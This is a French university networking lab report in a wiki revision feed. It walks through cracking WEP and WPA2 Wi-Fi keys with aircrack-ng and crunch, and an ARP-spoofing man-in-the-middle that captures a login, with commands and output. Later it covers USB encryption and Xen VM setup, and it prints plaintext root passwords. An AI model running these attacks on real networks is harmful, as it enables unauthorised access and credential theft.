 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. &lt;br /&gt;
&lt;br /&gt;
Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54020</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54020"/>
				<updated>2020-11-27T17:20:02Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
